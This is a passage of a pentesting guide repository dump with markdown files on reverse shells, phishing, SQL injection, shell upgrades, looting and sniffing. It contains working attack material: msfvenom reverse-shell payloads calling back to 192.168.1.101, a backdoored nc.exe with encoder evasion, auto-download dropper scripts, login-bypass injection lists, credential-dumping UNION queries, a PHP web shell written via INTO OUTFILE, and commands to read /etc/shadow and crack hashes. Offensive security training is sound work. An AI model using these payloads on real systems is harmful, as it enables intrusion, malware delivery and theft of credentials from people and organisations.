185 | 
186 | This php-shell is OS-independent. You can use it on both Linux and Windows.
187 | 
188 | ```
189 | msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php
190 | ```
191 | 
192 | ### ASP
193 | 
194 | ```
195 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp
196 | ```
197 | 
198 | ### WAR
199 | 
200 | ```
201 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war
202 | ```
203 | 
204 | ### JSP
205 | 
206 | ```
207 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp
208 | ```
209 | 
210 | 
211 | 
212 | 


--------------------------------------------------------------------------------
/scanning.md:
--------------------------------------------------------------------------------
 1 | # Recon and Information Gathering Phase
 2 | 
 3 | So once you have decided on a target you want to start your recon-process. 
 4 | 
 5 | The recon-phase is usually divided up into two phases.
 6 | 
 7 | 1. Passive information gathering / OSINT 
 8 |    This is when you check out stuff like:
 9 |  - Web information
10 |  - Email Harvesting
11 |  - Whois enumeration
12 | 
13 | 2. Active information gathering
14 | 
15 | This is when you start scanning the target with your different tools.
16 | 
17 | 


--------------------------------------------------------------------------------
/scripting_with_python.md:
--------------------------------------------------------------------------------
1 | # Scripting With Python
2 | 
3 | There are many high-level scripting languages that are easy to use. One really popular one is Python. 
4 | 
5 | 
6 | 


--------------------------------------------------------------------------------
/server-side-vulnerabilities.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/server-side-vulnerabilities.md


--------------------------------------------------------------------------------
/session-fixation.md:
--------------------------------------------------------------------------------
 1 | ## Session Fixation
 2 | 
 3 | 
 4 | 
 5 | Session fixation is a pretty small but common vulnerability.
 6 | 
 7 | A common way to handle the fact that HTTP is a stateless protocol is you store cookies in the users browser, and then have that cookie send to the web server on each subsequent request. This way the web server can know that the user has visited the website before. So when a user logs in to a web application a cookie for that session is usually created, in order for the web-server to know that the session is active.
 8 | 
 9 | Session fixation happens when the session-identifier \(in this case the cookie\) is setbefore the user has authenticated itself \(which is usually done with a simple username/password login\), and then not changed when the user authenticates itself.
10 | 
11 | For example, let's say you want to log in to a web application. When you first visit the site the following cookie is set:
12 | 
13 | ```
14 | SessionID=123ad76dab97b23ba8d76a
15 | ```
16 | 
17 | You then authenticate with your username and password and make a successful login. But the SessionID-cookie does not change. Then you have a session fixation vulnerability on your hands. Because this means that if an attacker can set the SessionID-cookie to a value the attacker knows it will then know the SessionID-cookie once the user actually authenticates.
18 | 
19 | ### How to set the cookie?
20 | 
21 | **In GET request** - if the session-token is sent in the URL of a GET-request the attacker can simply send a link which contains the attacker-controlled session-token.
22 | 
23 | **XSS** - If the attacker has also found a XSS vulnerability she can use it to set the cookie. This can of course be mitigated by setting the HttpOnly attribute to the cookie.
24 | 
25 | **META-tag** - If the attacker has the ability to inject html-code she can use the META-tag to set the cookie.
26 | 
27 | ```
28 | http://website.kon/<meta http-equiv=Set-Cookie content=”sessionid=abcd”>
29 | ```
30 | 
31 | **MITM** - By being MITM the attacker can set the cookie.
32 | 
33 | 
34 | 
35 | 
36 | 
37 | 
38 | 
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/setuid_c-code.md:
--------------------------------------------------------------------------------
 1 | # Setuid c-code
 2 | 
 3 | 
 4 | 
 5 | Sometimes you need setuid code. Here is a great snippet for it.
 6 | 
 7 | https://gist.github.com/jblyberg/3899599
 8 | 
 9 | ```
10 | #include <unistd.h>
11 | #include <errno.h>
12 | 
13 | main( int argc, char ** argv, char ** envp )
14 | {
15 |               if( setgid(getegid()) ) perror( "setgid" );
16 |               if( setuid(geteuid()) ) perror( "setuid" );
17 |               envp = 0; /* blocks IFS attack on non-bash shells */
18 |               system( "/path/to/bash/script", argv, envp );
19 |               perror( argv[0] );
20 |               return errno;
21 | }
22 | ```


--------------------------------------------------------------------------------
/smtp-user-enum.md:
--------------------------------------------------------------------------------
1 | # smtp-user-enum
2 | 
3 | You can find more about this is Server-site-vulnerabilities/List of common ports/Port 25
4 | https://bobloblaw.gitbooks.io/security/content/list_of_common_ports.html
5 | 


--------------------------------------------------------------------------------
/social_engineering_-_phishing.md:
--------------------------------------------------------------------------------
 1 | # Social Engineering - Phishing
 2 | 
 3 | Gaining initial access to a network is often done using different kinds of social engineering attacks.
 4 | 
 5 | ## Auto-download a malicious file
 6 | 
 7 | The techical part is not really that difficult here. In order to auto-download a file you just add this script to the malicious webpage
 8 | 
 9 | ```
10 | <script> document.location.href = 'shell53.exe'; </script>
11 | ```
12 | 
13 | Another way to do it is like this
14 | 
15 | ```
16 | <html>
17 | <head>
18 | <meta http-equiv="refresh" content="0; url=shell53.exe">
19 | </head>
20 | </html>
21 | ```
22 | 
23 | Of course the user will have to accept to download the file, unless the user has previously checked in the box automatically download. The user must then click the file for it to execute. This is where the social engineering part comes in, you really must trick the user into executing the file.
24 | 
25 | ### Change the filename
26 | 
27 | Since windows by default remove the filename you can call your file shell.jpg.exe, and once downloaded onto the machine windows will display it as "shell.jpg".
28 | 
29 | ### Embed malicious code in legitimate file
30 | 
31 | It is however very likely that this will be picked up by a antivirus.
32 | 
33 | ```
34 | msfvenom -a x86 --platform windows -x nc.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lhost=53 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o ncMalicious.exe
35 | ```
36 | 
37 | ## Autodownload a malicious javascript-file
38 | 
39 | Just like we can download an exe for a user to can also make that user download a javascript file. Since javascript files can execute commands on windows.
40 | 
41 | ```
42 | var oShell = new ActiveXObject("Shell.Application");
43 | var commandtoRun = "C:\\Windows\\system32\\calc.exe";
44 | oShell.ShellExecute(commandtoRun,"","","open","1");
45 | ```
46 | 
47 | ```
48 | http://evilsite.com/file.js
49 | ```
50 | 
51 | This code can be modified to greate a wget-script and then download and execute a script.
52 | 
53 | 
54 | ## Phishing
55 | 
56 | The most common tool for social engineering is to use Social Engineering Toolkit. SET. It comes as default in Kali. Run it like this:
57 | 
58 | 
59 | ```
60 | setoolkit
61 | ```
62 | 
63 | ## Spear phishing
64 | 
65 | ## Word/excel makros
66 | 
67 | An explanation of how to createa malicious makro-wordfile.
68 | 
69 | https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/
70 | 
71 | ## Embed a executable inside a PowerPoint
72 | 
73 | You can embed executables inside PowerPoint presentations and then have them execute about animations. 
74 | 
75 | ## Reference:
76 | https://www.youtube.com/watch?v=NTdthBQYa1k


--------------------------------------------------------------------------------
/spawning_shells.md:
--------------------------------------------------------------------------------
 1 | # Spawning shells
 2 | 
 3 | 
 4 | 
 5 | ## Non-interactive tty-shell
 6 | 
 7 | If you have a non-tty-shell there are certain commands and stuff you can't do. This can happen if you upload reverse shells on a webserver, so that the shell you get is by the user www-data, or similar. These users are not meant to have shells as they don't interact with the system has humans do. 
 8 | 
 9 | So if you don't have a tty-shell you can't run `su`, `sudo` for example. This can be annoying if you manage to get a root password but you can't use it.
10 | 
11 | Anyways, if you get one of these shells you can upgrade it to a tty-shell using the following methods:
12 | 
13 | 
14 | 
15 | **Using python**
16 | 
17 | ```
18 | python -c 'import pty; pty.spawn("/bin/sh")'
19 | ```
20 | 
21 | **Echo**
22 | 
23 | ```
24 | echo 'os.system('/bin/bash')'
25 | ```
26 | 
27 | **sh**
28 | 
29 | ```
30 | /bin/sh -i
31 | ```
32 | 
33 | **bash**
34 | 
35 | ```
36 | /bin/bash -i
37 | ```
38 | 
39 | **Perl**
40 | 
41 | ```
42 | perl -e 'exec "/bin/sh";'
43 | ```
44 | 
45 | **From within VI**
46 | 
47 | ```
48 | :!bash
49 | ```
50 | 
51 | ## Interactive tty-shell
52 | 
53 | So if you manage to upgrade to a non-interactive tty-shell you will still have a limited shell. You won't be able to use the up and down arrows, you won't have tab-completion. This might be really frustrating if you stay in that shell for long. It can also be more risky, if a execution gets stuck you cant use Ctr-C or Ctr-Z without killing your session. However that can be fixed using socat. Follow these instructions.
54 | 
55 | https://github.com/cornerpirate/socat-shell
56 | 
57 | ## References:
58 | 
59 | http://unix.stackexchange.com/questions/122616/why-do-i-need-a-tty-to-run-sudo-if-i-can-sudo-without-a-password
60 | http://netsec.ws/?p=337
61 | http://pentestmonkey.net/blog/post-exploitation-without-a-tty
62 | 


--------------------------------------------------------------------------------
/sql-injections.md:
--------------------------------------------------------------------------------
  1 | # SQL-injections
  2 | 
  3 | ## Tldr
  4 | 
  5 | ```
  6 | # Post
  7 | ./sqlmap.py -r request.txt -p username
  8 | 
  9 | # Get
 10 | sqlmap -u "http://192.168.1.101/index.php?id=1" --dbms=mysql
 11 | 
 12 | # Crawl
 13 | sqlmap -u http://192.168.1.101 --dbms=mysql --crawl=3
 14 | ```
 15 | 
 16 | ## How does sql-injections work?
 17 | 
 18 | So we have a website that is written in php. We have a login functionality, where the code looks like this:
 19 | 
 20 | ```php
 21 | mysql_connect("localhost", "pelle", "mySecretPassowrd") or die(mysql_error());
 22 | 
 23 | mysql_select_db("myHomepage");
 24 | 
 25 | if ($_POST['uname'] != ""){
 26 | 	$username = $_POST['username'];
 27 | 	$password = $_POST['password'];
 28 | 	$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
 29 | 	$result = mysql_query($query);
 30 | 	$row = mysql_fetch_array($result);
 31 | }
 32 | ```
 33 | 
 34 | So the user input is not filtered or sanitized in any way. Which means that what the users puts in in the login-form will be executed my mysql. So just like in xss-injections we just try to escape the input field to be able to execute sql-commands. So if we input the following into the user-field and password-field in the login:
 35 | 
 36 | ```
 37 | whatever' or '1'='1
 38 | whatever' or '1'='1
 39 | ```
 40 | 
 41 | The query will look like this:
 42 | 
 43 | ```
 44 | $query = "SELECT * FROM users WHERE username = 'whatever' OR '1'='1' AND password='whatever' OR '1'='1'";
 45 | ```
 46 | 
 47 | Since they both become true the database will retrieve all users and we will be able to bypass the login.
 48 | 
 49 | If you know the username you could of course use that and then only inject on the password parameter.
 50 | 
 51 | ```
 52 | $query = "SELECT * FROM users WHERE username = 'admin' AND password='whatever' OR '1'='1'";
 53 | ```
 54 | 
 55 | 
 56 | 
 57 | ## SQLmap
 58 | 
 59 | Sqlmap is a great tool to perform sql-injections.
 60 | Here is the manual.
 61 | https://github.com/sqlmapproject/sqlmap/wiki/Usage
 62 | 
 63 | ### Using sqlmap with login-page
 64 | 
 65 | So you need to authenticate before you can access the vulnerable paramter.
 66 | 
 67 | You just cature the request using burp suite, and save the requiest in a file. Then your run
 68 | 
 69 | ```
 70 | sqlmap -r request.txt
 71 | ```
 72 | 
 73 | Since the cookie is saved in the reuqest sqlmap can do it.
 74 | 
 75 | ### Crawl a page to find sql-injections
 76 | 
 77 | ```
 78 | sqlmap -u http://example.com --crawl=1
 79 | ```
 80 | 
 81 | ### Dumping a database or table
 82 | 
 83 | Here we are dumping the database Webapp and the table Users.
 84 | 
 85 | ```
 86 | sqlmap -r request.txt -p username --dbms=mysql --dump -D Webapp -T Users
 87 | ```
 88 | 
 89 | ### Use proxy
 90 | 
 91 | ```
 92 | --proxy="http://192.2.2.2.2:1111"
 93 | ```
 94 | 
 95 | **Proxy credencials**
 96 | 
 97 | ```
 98 | --proxy-cred="username:password"
 99 | ```
100 | 
101 | 
102 | 
103 | ## Login bypass
104 | 
105 | 
106 | This is the most classic, standard first test:
107 | ```
108 | ' or '1'='1
109 | ```
110 | 
111 | Then you have:
112 | 
113 | ```
114 | -'
115 | ' '
116 | '&'
117 | '^'
118 | '*'
119 | ' or ''-'
120 | ' or '' '
121 | ' or ''&'
122 | ' or ''^'
123 | ' or ''*'
124 | "-"
125 | " "
126 | "&"
127 | "^"
128 | "*"
129 | " or ""-"
130 | " or "" "
131 | " or ""&"
132 | " or ""^"
133 | " or ""*"
134 | or true--
135 | " or true--
136 | ' or true--
137 | ") or true--
138 | ') or true--
139 | ' or 'x'='x
140 | ') or ('x')=('x
141 | ')) or (('x'))=(('x
142 | " or "x"="x
143 | ") or ("x")=("x
144 | ")) or (("x"))=(("x
145 | ```
146 | 
147 | ## Sql-injections manually
148 | 
149 | Sqlmap is good, but it is not very stealthy. And it can generate a lot of traffic. And also it is good to understand the vulnerability in the cote and not just run tools. So let's learn sql-injections the manual way.
150 | 
151 | The two main ways for perform a sql-injection: **error based** or **blind**.
152 | 
153 | ### Error-bases DB enumeration
154 | 
155 | If we manage to find an error-message after a broken sql-query, we can use that to try to map out the database structure.
156 | 
157 | For example, if we have a url that end with 
158 | 
159 | ```
160 | http://example.com/photoalbum.php?id=1
161 | ```
162 | 
163 | #### Step 1 - Add the tick '
164 | 
165 | So first we should try to break the sql-syntaxt by adding a `'`.
166 | We should first ad a `'` or a `"`. 
167 | 
168 | ```
169 | http://example.com/photoalbum.php?id=1'
170 | ```
171 | 
172 | If the page then returns a blank page or a page with a sql-error we know that the page it vulnerable.
173 | 
174 | #### Step 2 - Enumerate columns
175 | 
176 | So in order to enumerate the columns of a table we can use the **order by**
177 | 
178 | **Order by 1** means sort by values of the first column from the result set.
179 | **Order by 2** means sort by values of the second column from the result set. 
180 | 
181 | So it is basically just a tool to order the data in a table. But we can use it to find out how many columns a table has. Because if we do **order by 10** when there really only is 9 columns sql will throw an error. And we will know how many columns the table has.
182 | 
183 | ```
184 | # This trhows no error
185 | http://example.com/photoalbum.php?id=1 order by 9
186 | # This throws error
187 | http://example.com/photoalbum.php?id=1 order by 10
188 | ```
189 | 
190 | So you just increase the number (or do a binary tree search if you want tot do it a bit faster) until you get an error, and you know how many columns the table has. 
191 | 
192 | #### Step 3 - Find space to output db
193 | 
194 | Now we need to know which coolumns are being outputed on the webpage. It could be that not all data from the database is worthwhile to output, so maybe only column 1 and 3 are being outputted to the website.
195 | 
196 | To find out which columns are being outputted we can use the **union select** command. So we do the command like this
197 | 
198 | ```
199 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9
200 | ```
201 | 
202 | For all the columns that exists. This will return the numbers of the columns that are being outputted on the website. Take note of which these columns are.
203 | 
204 | #### Step 4 - Start enumerating the database
205 | 
206 | Now we can use that field to start outputing data. For example if columns number five has been visible in step 3, we can use that to output the data. 
207 | 
208 | Here is a list of data we can retrieve from the database. Some of the syntaxes may difference depending on the database engine (mysql, mssql, postgres).
209 | 
210 | ```
211 | # Get username of the sql-user
212 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,user(),6,7,8,9
213 | 
214 | # Get version
215 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,version(),6,7,8,9
216 | 
217 | # Get all tables
218 | 
219 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
220 | 
221 | # Get all columns from a specific table
222 | 
223 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users'
224 | 
225 | # Get content from the users-table. From columns name and password. The 0x3a only servers to create a delimitor between name and password
226 | 
227 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,concat(name,0x3a,
228 | password),6,7,8,9 FROM users
229 | ```
230 | 
231 | 
232 | 
233 | ### Blind sql-injection
234 | 
235 | We say that it is blind because we do not have access to the error log. This make the whole process a lot more complicated. But it is of course still possible to exploit.
236 | 
237 | #### Using sleep
238 | 
239 | Since we do not have access to the logs we do not know if our commands are syntaxically correct or not. To know if it is correct or not we can however use the sleep statement.
240 | 
241 | ```
242 | http://example.com/photoalbum.php?id=1-sleep(4)
243 | ```
244 | 
245 | If it lods for four seconds exta we know that the database is processing our sleep() command. 
246 | 
247 | 
248 | ### Get shell from sql-injection
249 | 
250 | The good part about mysql from a hacker-perspective is that you can actaully use slq to write files to the system. The will let us write a backdoor to the system that we can use.
251 | 
252 | 
253 | #### Load files
254 | 
255 | UNION SELECT 1, load_file(/etc/passwd) #
256 | 
257 | ```
258 | http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
259 | shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
260 | 
261 | ```
262 | #### Write files
263 | 
264 | ```
265 | http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
266 | shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
267 | 
268 | http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
269 | shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'
270 | ```
271 | 
272 | #### MSSQL - xp_cmdshell
273 | 
274 | You can run commands straight from the sql-query in MSSQL.
275 | 
276 | 
277 | ## Truncating Mysql Vulerability
278 | 
279 | Basically this happens when you don't validate the length of user input. 
280 | Two things are needed for it to work:
281 | 
282 | - Mysql does not make comparisons in binary mode. This means that "admin" and "admin        " are the same.
283 | 
284 | - If the username column in the database has a character-limit the rest of the characters are truncated, that is removed. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
285 | 
286 | With this information we can create a new admin-user and have our own password set to it. So if the max-length is 20 characters we can insert the following string
287 | 
288 | ```
289 | admin               removed
290 | ```
291 | 
292 | This means that the "removed" part will be removed/truncated/deleted. And the trailing spaces will be removed upon insert in the database. So it will effectively be inserted as "admin".
293 | 
294 | 
295 | 
296 | ## References
297 | 
298 | http://resources.infosecinstitute.com/sql-truncation-attack/
299 | http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
300 | http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/


--------------------------------------------------------------------------------
/ssl-strip.md:
--------------------------------------------------------------------------------
1 | # SSL-strip
2 | 
3 | If the user you are intercepting is communicating over HTTPS your interception will trigger an alert very time a user tried to enter a https-page. This is not what we want. In order do bypass this we can remove the ssl-part of every request. It is less likely that the user will notice a change from HTTPS to HTTP in the url-bar.
4 | 
5 | 
6 | ## Reference
7 | Penteration Testing - A hands on introduction to hacking. Page 174
8 | 


--------------------------------------------------------------------------------
/styles/ebook.css:
--------------------------------------------------------------------------------
1 | /* CSS for ebook */
2 | 


--------------------------------------------------------------------------------
/styles/print.css:
--------------------------------------------------------------------------------
1 | /* CSS for print */
2 | 


--------------------------------------------------------------------------------
/styles/website.css:
--------------------------------------------------------------------------------
1 | .markdown-section pre {
2 | background-color: #ddd;
3 | }
4 | 
5 | .markdown-section code {
6 | background-color: #ddd;
7 | }


--------------------------------------------------------------------------------
/subdomain_takeover.md:
--------------------------------------------------------------------------------
 1 | # Subdomain Takeover
 2 | 
 3 | This is a really cool attack.
 4 | 
 5 | First you looks for all subdomains. Sometimes a company has forgotten about a subdomain. Like and old support system called `support.example.com`. And then the support-system that points to that domain gets removed. That means that we could start a service for support, and like it to that domain. And thereby controlling the domain.
 6 | 
 7 | 
 8 | 
 9 | HackerOne reports
10 | 
11 | https://hackerone.com/reports/114134
12 | https://hackerone.com/reports/109699
13 | 
14 | https://blog.getwhitehats.com/being-a-developer-can-be-a-stressful-job-following-the-request-of-your-employer-creating-website-e96af56e51c3#.t3tqd5s0n
15 | http://yassineaboukir.com/blog/neglected-dns-records-exploited-to-takeover-subdomains/
16 | https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/


--------------------------------------------------------------------------------
/tcp-dumps_on_pwnd_machines.md:
--------------------------------------------------------------------------------
  1 | 
  2 | # Loot Linux
  3 | 
  4 | ## Passwords and hashes
  5 | 
  6 | First grab the passwd and shadow file.
  7 | 
  8 | ```bash
  9 | cat /etc/passwd
 10 | cat /etc/shadow
 11 | ```
 12 | 
 13 | We can crack the password using `john the ripper` like this:
 14 | 
 15 | ```
 16 | unshadow passwd shadow > unshadowed.txt
 17 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
 18 | ```
 19 | 
 20 | ## Interesting files
 21 | 
 22 | ```
 23 | #Meterpreter
 24 | search -f *.txt
 25 | search -f *.zip
 26 | search -f *.doc
 27 | search -f *.xls
 28 | search -f config*
 29 | search -f *.rar
 30 | search -f *.docx
 31 | search -f *.sql
 32 | 
 33 | .ssh:
 34 | .bash_history
 35 | ```
 36 | 
 37 | ## Mail
 38 | 
 39 | ```
 40 | /var/mail
 41 | /var/spool/mail
 42 | ```
 43 | 
 44 | ## Tcp-dump
 45 | 
 46 | Fast command:
 47 | 
 48 | ```
 49 | tcpdump -i any -s0 -w capture.pcap
 50 | tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
 51 | tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
 52 | ```
 53 | 
 54 | First we need to figure out what interfaces the machine is using: `ifconfig`. Then we can just start tapping in on that and start to capture those packets.
 55 | 
 56 | ### Commands and flags
 57 | 
 58 | Let's start with the basics.
 59 | `tcpdump` - this command will output all network traffic straight to the terminal. Might be hard to understand if there is a lot of traffic.
 60 | 
 61 | `-A` - stands for Ascii, and output it in ascii.
 62 | 
 63 | `-w file.pcap` - the w-flag will save the output into the filename of your choice. The traffic is stored in pcap-format, which is the standard packet-analysis-format. 
 64 | 
 65 | `-i any` - will capture traffic for all interfaces.
 66 | 
 67 | `-D` - show list of all interfaces
 68 | 
 69 | `-q` - be less verbose. Be more `quiet`
 70 | 
 71 | `-s` - The default size that tcpdump captures is only 96 bytes. If you want it to capture more you have to define it yourself `-s0` gives you the whole packet.
 72 | 
 73 | `-c` - count. Set how many packets you want to intercept. And then stop. Is useful if you have a non-interactive shell, this way to can capture packets without having to leave with `ctr-c`. 
 74 | 
 75 | `port 22` - only see traffic on a specific port.
 76 | 
 77 | `-vvv` - Verbose. Depending on how verbose you want the output. 
 78 | 
 79 | ### Useful commands
 80 | 
 81 | Lots of good stuff here
 82 | http://www.rationallyparanoid.com/articles/tcpdump.html
 83 | 
 84 | ```
 85 | tcpdump -i wlan0 -vvv -A | grep "GET"
 86 | ```
 87 | This will grep all GET from the wlan0 interface.
 88 | This will not get any SSL-encrypted traffic.
 89 | 
 90 | ```
 91 | sudo tcpdump -i wlan0 src port 80 or dst port 80 -w port-80-recording.pcap
 92 | sudo tcpdump -i eth0 src port 80 or dst port 80 -w port-80-recording.pcap
 93 | ```
 94 | 
 95 | Print the traffic in hex with ascii interpretation.
 96 | 
 97 | ```
 98 | tcpdump -nX -r file.pcap
 99 | ```
100 | 
101 | Only record tcp-traffic
102 | 
103 | ```
104 | tcpdump tcp -w file.pcap
105 | ```
106 | 
107 | 
108 | ### Sniffing for passwords
109 | 
110 | Once we have dumped some of the traffic we can insert it into metasploit and run `psnuffle` on it. It can sniff passwords and usernames from **pop3**, **imap**, **ftp**, and **HTTP GET**. This is a really easy way to find usernames and passwords from traffic that you have already dumped, or are in the process of dumping.
111 | 
112 | ```
113 | use auxiliary/sniffer/psnuffle
114 | ```
115 | 
116 | https://www.offensive-security.com/metasploit-unleashed/password-sniffing/
117 | 
118 | 
119 | 
120 | ## References
121 | 
122 | 
123 | http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/
124 | 
125 | https://danielmiessler.com/study/tcpdump/
126 | 
127 | https://www.sans.org/reading-room/whitepapers/testing/post-exploitation-metasploit-pivot-port-33909
128 | 
129 | http://jvns.ca/blog/2016/03/16/tcpdump-is-amazing/
130 | 


--------------------------------------------------------------------------------
/text-injection.md:
--------------------------------------------------------------------------------
1 | # Text/content-injection
2 | 
3 | 
4 | Relevant hackerone reports:
5 | https://hackerone.com/reports/145853
6 | 
7 | https://www.owasp.org/index.php/Content_Spoofing
8 | 


--------------------------------------------------------------------------------
/the_basics.md:
--------------------------------------------------------------------------------
 1 | # The Basics
 2 | 
 3 | In this chapter we will look at some basics, good stuff to know before we begin. The basics of how Windows work and the basics of Linux. 
 4 | 
 5 | It is also pretty useful to know how to cook together a simple bash-script, so we are going to look at some really simple bash operations.
 6 | 
 7 | And a little bit about PowerShell, and the windows command line. PowerShell is becomming more and more important as a tool for hackers. So this chapters will probably keep expanding.
 8 | 
 9 | Python is also the hackers friend, so I have included a little bit about some basic operations with python.
10 | 
11 | Transferring files is also pretty fundamental. It could be placed in the post-exploit chapter, but I think it fits better here since it is necessary for any work between different machines.
12 | 
13 | Vim is another thing that you can't live without. So can use it as your main editor for writing and editing code or notes, but even if you don't use it as your main editor you still need to know the basics of it in order to be able to edit files on your hacked machines.  
14 | 
15 | 


--------------------------------------------------------------------------------
/tips.md:
--------------------------------------------------------------------------------
1 | # Tips
2 | 
3 | - Whenever you find a service always make sure you know if it is vulnerable or not. Be it ssh, ftp, server, front-end library or framework. And unpatched ssh-client can count as a bug in a bug bounty program.
4 | 
5 | For example, se this bug report:
6 | https://hackerone.com/reports/139940


--------------------------------------------------------------------------------
/tools.md:
--------------------------------------------------------------------------------
  1 | # Tools
  2 | 
  3 | These are our tools:
  4 | - ltrace
  5 | - strings
  6 | - file
  7 | - objdump
  8 | - gdb
  9 | 
 10 | 
 11 | 
 12 | This is a great little trick. If you are working a lot with hexadecimal and you want to easily convert it to ascii you can write this in bash
 13 | ```
 14 | echo 6a6548 | xxd -r -p
 15 | ```
 16 | will print out: **jeH**
 17 | xxd is a program that makes ascii into hexdumps. with the -r we can reverse it. 
 18 | 
 19 | ## Nasm to opcode
 20 | 
 21 | If we want to convert an assembly instruction to opcode we can use this tool
 22 | 
 23 | ```
 24 | /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
 25 | 
 26 | nasm > JMP ESP
 27 | 00000000  FFE4              jmp esp
 28 | ```
 29 | 
 30 | 
 31 | ## Objdump
 32 | Objdump is a program that outputs the assembly code of a compiled program. It ca be executed like this.
 33 | example: 
 34 | ```
 35 | objdump -D myProgram
 36 | objdump -M intel -d program_name ;This is to read the assembly in intel-syntax
 37 | 
 38 | 
 39 | ```
 40 | 
 41 | ## GDB - GNU Debugger
 42 | 
 43 | 
 44 | ###Setting breakpoints
 45 | Sometimes you want the debugger to stop at a certain point in the program, so that you can investigate memory and stuff. We can set these breakpoints with the following command:
 46 | 
 47 | Set a break at the main-function
 48 | ```
 49 | break main
 50 | ```
 51 | 
 52 | Set a break at that line. I think it is set before the line is executed.
 53 | ```
 54 | break 10
 55 | ```
 56 | 
 57 | **Show breakpoints**
 58 | If you want to know which breakpoints you have set you can run:
 59 | ```
 60 | info breakpoint
 61 | info break
 62 | info b
 63 | ```
 64 | 
 65 | **Remove breakpoints** 
 66 | Will delete all breakpoints on line 9
 67 | ```
 68 | clear 9
 69 | ``` 
 70 | 
 71 | Run the program
 72 | ```
 73 | run
 74 | ```
 75 | 
 76 | Show code
 77 | ```
 78 | list ; show code if you have compile it with the -g flag
 79 | list 10` ; will show the code around line 10. five lines before, and five lines after.
 80 | list 1,20 ; will list all lines between the numbers.
 81 | ```
 82 | 
 83 | This shows the code in assembly. It is pretty much the same as running objdump.
 84 | ```
 85 | disassemble main
 86 | ```
 87 | 
 88 | Show info about instruct pointer
 89 | ```
 90 | info register eip
 91 | i r eip
 92 | ```
 93 | On 64bit machines it is called `rip`instead of `eip`. It basically shows to what address eip is pointing at. So the output might be something like this:
 94 | ```
 95 | (gdb) i r rip
 96 | rip            0x4004aa	0x4004aa <main+4>
 97 | ```
 98 | Which means that rip at this moment is pointing at 0x4004aa. Which means that this is going to be the next instruct that gets executed.
 99 | 
100 | The structure is like this:
101 | ```
102 | examine/[format] address
103 | x/
104 | ```
105 | 
106 | Format is how you want to display the memory. Here are the following formats:
107 | ```
108 |     o - octal
109 |     x - hexadecimal
110 |     d - decimal
111 |     u - unsigned decimal
112 |     t - binary
113 |     f - floating point
114 |     a - address
115 |     c - char
116 |     s - string
117 |     i - instruction
118 | ```
119 | 
120 | Example:
121 | ```
122 | x/s myVariable
123 | ```
124 | This means: examine myVariable, and output the content in that memory in the form of a string.
125 | Now this does not work for values that does not have a memory address. It will just give you `
126 | ```
127 | 0x16:	Cannot access memory at address 0x16
128 | ```
129 | That is because the variable is not a pointer (it does not point to an memory-address), but instead it is a hardcoded value.
130 | 
131 | ```
132 | x/i $rip
133 | ```
134 | Examine/info instruction pointer register. This command can be used to examine a specific part of memory. In this example it was the instruct pointer, but it can also be a specific address in memory. 
135 | 
136 | 
137 | ### Show all functions
138 | 
139 | 
140 | ```
141 | info funcions
142 | ```
143 | 
144 | **Python**
145 | Python can be quite useful go generate strings as input. Of course this can be done with a lot of other languages. so it would work like this.
146 | ```
147 | ./myProgram $(python -c 'print "\x41" * 30')
148 | ```
149 | Basically, the `$(python)` creates a shell within our command. And in that shell we run the normal python command. The `-c` flag tells python that we are going to run a command instead of opening up the interactive shell. You can test this in the terminal like this:
150 | ```
151 | $ python -c 'print "hello" * 100'
152 | hellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohello
153 | ```
154 | 
155 | 
156 | #### GCC
157 | Compile the program in debugger mode, so that the debugger has access to the code.
158 | ```
159 | gcc -g program.c
160 | ```
161 | 
162 | 


--------------------------------------------------------------------------------
/tools_of_the_trade.md:
--------------------------------------------------------------------------------
1 | # Tools of the trade
2 | 
3 | Here is just a collection of some tools that I use that I want to have an easy manual for.


--------------------------------------------------------------------------------
/transfering_files.md:
--------------------------------------------------------------------------------
  1 | # Transferring Files on Linux
  2 | 
  3 | ## Set Up a Simple Python Webserver
  4 | 
